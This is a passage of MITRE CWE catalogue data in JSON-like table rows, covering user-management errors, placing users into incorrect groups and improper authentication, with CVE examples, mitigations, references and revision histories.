] | null |
[
{
"EntryID": null,
"EntryName": "User management errors",
"MappingFit": null,
"TaxonomyName": "PLOVER"
}
] | null | null |
[
{
"Note": "The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693).",
"Type": "Maintenance"
},
{
"Note": "This item needs more work. Possible sub-categories include: user in wrong group, and user with insecure profile or \"configuration\". It also might be better expressed as a category than a weakness.",
"Type": "Maintenance"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Maintenance_Notes, Relationships",
"ModificationDate": "2011-03-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Modes_of_Introduction, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2008-09-09",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "User Management Issues",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed-with-Review
|
This CWE entry is a Class and might have Base-level children that would be more appropriate
|
Examine children of this entry to see if there is a better fit
|
[
"Abstraction"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 1
|
[
[
"284",
"286"
]
] |
[
"842"
] |
842
|
Placement of User into Incorrect Group
|
Base
|
Simple
|
Incomplete
|
The product or the administrator places a user into an incorrect group.
|
If the incorrect group has more access or privileges than the intended group, the user might be able to bypass intended security policy to access unexpected resources or perform unexpected actions. The access-control system might not be able to detect malicious usage of this group membership.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": null,
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Gain Privileges or Assume Identity"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Access Control"
]
}
] | null |
[
{
"Description": "Operating system assigns user to privileged wheel group, allowing the user to gain root privileges.",
"Link": "https://www.cve.org/CVERecord?id=CVE-1999-1193",
"Reference": "CVE-1999-1193"
},
{
"Description": "Chain: drafted web request allows the creation of users with arbitrary group membership.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2010-3716",
"Reference": "CVE-2010-3716"
},
{
"Description": "Chain: improper processing of configuration options causes users to contain unintended group memberships.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-5397",
"Reference": "CVE-2008-5397"
},
{
"Description": "CMS does not prevent remote administrators from promoting other users to the administrator group, in violation of the intended security model.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2007-6644",
"Reference": "CVE-2007-6644"
},
{
"Description": "Product assigns members to the root group, allowing escalation of privileges.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2007-3260",
"Reference": "CVE-2007-3260"
},
{
"Description": "Chain: daemon does not properly clear groups before dropping privileges.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-0080",
"Reference": "CVE-2002-0080"
}
] | null | null | null | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2011-03-24",
"SubmissionName": "CWE Content Team",
"SubmissionOrganization": "MITRE",
"SubmissionReleaseDate": "2011-03-30",
"SubmissionVersion": "1.12",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "286",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 1
|
[
[
"284",
"286",
"842"
]
] |
[] |
287
|
Improper Authentication
|
Class
|
Simple
|
Draft
|
When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct.
| null |
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "ICS/OT",
"Name": null,
"Prevalence": "Often",
"Type": "Technology"
}
] |
[
{
"Description": "An alternate term is \"authentification\", which appears to be most commonly used by people from non-English-speaking countries.",
"Term": "authentification"
},
{
"Description": "\"AuthN\" is typically used as an abbreviation of \"authentication\" within the web application security community. It is also distinct from \"AuthZ,\" which is an abbreviation of \"authorization.\" The use of \"Auth\" as an abbreviation is discouraged, since it could be used for either authentication or authorization.",
"Term": "AuthN"
},
{
"Description": "\"AuthC\" is used as an abbreviation of \"authentication,\" but it appears to used less frequently than \"AuthN.\"",
"Term": "AuthC"
}
] |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Read Application Data",
"Gain Privileges or Assume Identity",
"Execute Unauthorized Code or Commands"
],
"Likelihood": null,
"Note": "This weakness can lead to the exposure of resources or functionality to unintended actors, possibly providing attackers with sensitive information or even execute arbitrary code.",
"Scope": [
"Integrity",
"Confidentiality",
"Availability",
"Access Control"
]
}
] |
[
{
"Description": "Use an authentication framework or library such as the OWASP ESAPI Authentication feature.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": "Libraries or Frameworks"
}
] |
[
{
"Description": "Chat application skips validation when Central Authentication Service (CAS) is enabled, effectively removing the second factor from two-factor authentication",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-35248",
"Reference": "CVE-2022-35248"
},
{
"Description": "Python-based authentication proxy does not enforce password authentication during the initial handshake, allowing the client to bypass authentication by specifying a 'None' authentication type.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-36436",
"Reference": "CVE-2022-36436"
},
{
"Description": "Chain: Web UI for a Python RPC framework does not use regex anchors to validate user login emails (CWE-777), potentially allowing bypass of OAuth (CWE-1390).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-30034",
"Reference": "CVE-2022-30034"
},
{
"Description": "TCP-based protocol in Programmable Logic Controller (PLC) has no authentication.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-29951",
"Reference": "CVE-2022-29951"
},
{
"Description": "Condition Monitor uses a protocol that does not require authentication.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-29952",
"Reference": "CVE-2022-29952"
},
{
"Description": "Safety Instrumented System uses proprietary TCP protocols with no authentication.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-30313",
"Reference": "CVE-2022-30313"
},
{
"Description": "Distributed Control System (DCS) uses a protocol that has no authentication.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-30317",
"Reference": "CVE-2022-30317"
},
{
"Description": "SCADA system only uses client-side authentication, allowing adversaries to impersonate other users.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-33139",
"Reference": "CVE-2022-33139"
},
{
"Description": "Chain: Python-based HTTP Proxy server uses the wrong boolean operators (CWE-480) causing an incorrect comparison (CWE-697) that identifies an authN failure if all three conditions are met instead of only one, allowing bypass of the proxy authentication (CWE-1390)",
"Link": "https://www.cve.org/CVERecord?id=CVE-2021-3116",
"Reference": "CVE-2021-3116"
},
{
"Description": "Chain: Cloud computing virtualization platform does not require authentication for upload of a tar format file (CWE-306), then uses .. path traversal sequences (CWE-23) in the file to access unexpected files, as exploited in the wild per CISA KEV.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2021-21972",
"Reference": "CVE-2021-21972"
},
{
"Description": "IT management product does not perform authentication for some REST API requests, as exploited in the wild per CISA KEV.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2021-37415",
"Reference": "CVE-2021-37415"
},
{
"Description": "Firmware for a WiFi router uses a hard-coded password for a BusyBox shell, allowing bypass of authentication through the UART port",
"Link": "https://www.cve.org/CVERecord?id=CVE-2021-35033",
"Reference": "CVE-2021-35033"
},
{
"Description": "Bluetooth speaker does not require authentication for the debug functionality on the UART port, allowing root shell access",
"Link": "https://www.cve.org/CVERecord?id=CVE-2020-10263",
"Reference": "CVE-2020-10263"
},
{
"Description": "Default setting in workflow management product allows all API requests without authentication, as exploited in the wild per CISA KEV.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2020-13927",
"Reference": "CVE-2020-13927"
},
{
"Description": "Stack-based buffer overflows in SFK for wifi chipset used for IoT/embedded devices, as exploited in the wild per CISA KEV.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2021-35395",
"Reference": "CVE-2021-35395"
},
{
"Description": "Mail server does not properly check an access token before executing a Powershell command, as exploited in the wild per CISA KEV.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2021-34523",
"Reference": "CVE-2021-34523"
},
{
"Description": "Chain: user is not prompted for a second authentication factor (CWE-287) when changing the case of their username (CWE-178), as exploited in the wild per CISA KEV.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2020-12812",
"Reference": "CVE-2020-12812"
},
{
"Description": "Authentication bypass by appending specific parameters and values to a URI, as exploited in the wild per CISA KEV.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2020-10148",
"Reference": "CVE-2020-10148"
},
{
"Description": "Mail server does not generate a unique key during installation, as exploited in the wild per CISA KEV.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2020-0688",
"Reference": "CVE-2020-0688"
},
{
"Description": "LDAP Go package allows authentication bypass using an empty password, causing an unauthenticated LDAP bind",
"Link": "https://www.cve.org/CVERecord?id=CVE-2017-14623",
"Reference": "CVE-2017-14623"
},
{
"Description": "login script for guestbook allows bypassing authentication by setting a \"login_ok\" parameter to 1.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-3421",
"Reference": "CVE-2009-3421"
},
{
"Description": "admin script allows authentication bypass by setting a cookie value to \"LOGGEDIN\".",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-2382",
"Reference": "CVE-2009-2382"
},
{
"Description": "VOIP product allows authentication bypass using 127.0.0.1 in the Host header.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-1048",
"Reference": "CVE-2009-1048"
},
{
"Description": "product uses default \"Allow\" action, instead of default deny, leading to authentication bypass.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-2213",
"Reference": "CVE-2009-2213"
},
{
"Description": "chain: redirect without exit (CWE-698) leads to resultant authentication bypass.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-2168",
"Reference": "CVE-2009-2168"
},
{
"Description": "product does not restrict access to a listening port for a critical service, allowing authentication to be bypassed.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-3107",
"Reference": "CVE-2009-3107"
},
{
"Description": "product does not properly implement a security-related configuration setting, allowing authentication bypass.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-1596",
"Reference": "CVE-2009-1596"
},
{
"Description": "authentication routine returns \"nil\" instead of \"false\" in some situations, allowing authentication bypass using an invalid username.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-2422",
"Reference": "CVE-2009-2422"
},
{
"Description": "authentication update script does not properly handle when admin does not select any authentication modules, allowing authentication bypass.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-3232",
"Reference": "CVE-2009-3232"
},
{
"Description": "use of LDAP authentication with anonymous binds causes empty password to result in successful authentication",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-3231",
"Reference": "CVE-2009-3231"
},
{
"Description": "product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-3435",
"Reference": "CVE-2005-3435"
},
{
"Description": "chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-0408",
"Reference": "CVE-2005-0408"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Authentication Error",
"MappingFit": null,
"TaxonomyName": "PLOVER"
},
{
"EntryID": "A7",
"EntryName": "Broken Authentication and Session Management",
"MappingFit": "CWE More Specific",
"TaxonomyName": "OWASP Top Ten 2007"
},
{
"EntryID": "A3",
"EntryName": "Broken Authentication and Session Management",
"MappingFit": "CWE More Specific",
"TaxonomyName": "OWASP Top Ten 2004"
},
{
"EntryID": "1",
"EntryName": "Insufficient Authentication",
"MappingFit": null,
"TaxonomyName": "WASC"
},
{
"EntryID": "Part 3-3",
"EntryName": "Req SR 1.1",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 3-3",
"EntryName": "Req SR 1.2",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 4-2",
"EntryName": "Req CR 1.1",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 4-2",
"EntryName": "Req CR 1.2",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
}
] |
[
"114",
"115",
"151",
"194",
"22",
"57",
"593",
"633",
"650",
"94"
] |
[
{
"Authors": [
"Kim Zetter"
],
"Edition": null,
"ExternalReferenceID": "REF-236",
"Publication": null,
"PublicationDay": "09",
"PublicationMonth": "01",
"PublicationYear": "2009",
"Publisher": null,
"Section": null,
"Title": "Weak Password Brings 'Happiness' to Twitter Hacker",
"URL": "https://www.wired.com/2009/01/professed-twitt/",
"URLDate": "2023-04-07"
},
{
"Authors": [
"OWASP"
],
"Edition": null,
"ExternalReferenceID": "REF-237",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2007",
"Publisher": null,
"Section": null,
"Title": "Top 10 2007-Broken Authentication and Session Management",
"URL": "http://www.owasp.org/index.php/Top_10_2007-A7",
"URLDate": null
},
{
"Authors": [
"OWASP"
],
"Edition": null,
"ExternalReferenceID": "REF-238",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Guide to Authentication",
"URL": "http://www.owasp.org/index.php/Guide_to_Authentication",
"URLDate": null
},
{
"Authors": [
"Microsoft"
],
"Edition": null,
"ExternalReferenceID": "REF-239",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Authentication",
"URL": "http://msdn.microsoft.com/en-us/library/aa374735(VS.85).aspx",
"URLDate": null
},
{
"Authors": [
"Michael Howard",
"David LeBlanc"
],
"Edition": "2nd Edition",
"ExternalReferenceID": "REF-7",
"Publication": null,
"PublicationDay": "04",
"PublicationMonth": "12",
"PublicationYear": "2002",
"Publisher": "Microsoft Press",
"Section": "Chapter 4, \"Authentication\" Page 109",
"Title": "Writing Secure Code",
"URL": "https://www.microsoftpressstore.com/store/writing-secure-code-9780735617223",
"URLDate": null
},
{
"Authors": [
"Forescout Vedere Labs"
],
"Edition": null,
"ExternalReferenceID": "REF-1283",
"Publication": null,
"PublicationDay": "20",
"PublicationMonth": "06",
"PublicationYear": "2022",
"Publisher": null,
"Section": null,
"Title": "OT:ICEFALL: The legacy of \"insecure by design\" and its implications for certifications and risk management",
"URL": "https://www.forescout.com/resources/ot-icefall-report/",
"URLDate": null
}
] |
[
{
"Note": "This can be resultant from SQL injection vulnerabilities and other issues.",
"Type": "Relationship"
},
{
"Note": "The Taxonomy_Mappings to ISA/IEC 62443 were added in CWE 4.10, but they are still under review and might change in future CWE versions. These draft mappings were performed by members of the \"Mapping CWE to 62443\" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG), and their work is incomplete as of CWE 4.10. The mappings are included to facilitate discussion and review by the broader ICS/OT community, and they are likely to change in future CWE versions.",
"Type": "Maintenance"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "Suggested OWASP Top Ten 2004 mapping",
"ModificationDate": "2008-08-15",
"ModificationName": null,
"ModificationOrganization": "Veracode",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Alternate_Terms, Common_Consequences, Relationships, Relationship_Notes, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
